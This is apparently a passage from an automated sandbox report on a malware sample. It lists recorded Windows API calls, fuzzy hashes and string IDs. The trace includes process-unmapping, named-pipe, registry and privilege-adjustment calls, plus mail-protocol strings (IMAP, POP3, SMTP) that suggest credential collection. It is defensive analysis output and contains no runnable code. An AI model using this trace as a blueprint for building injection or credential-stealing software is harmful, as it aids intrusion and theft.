  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
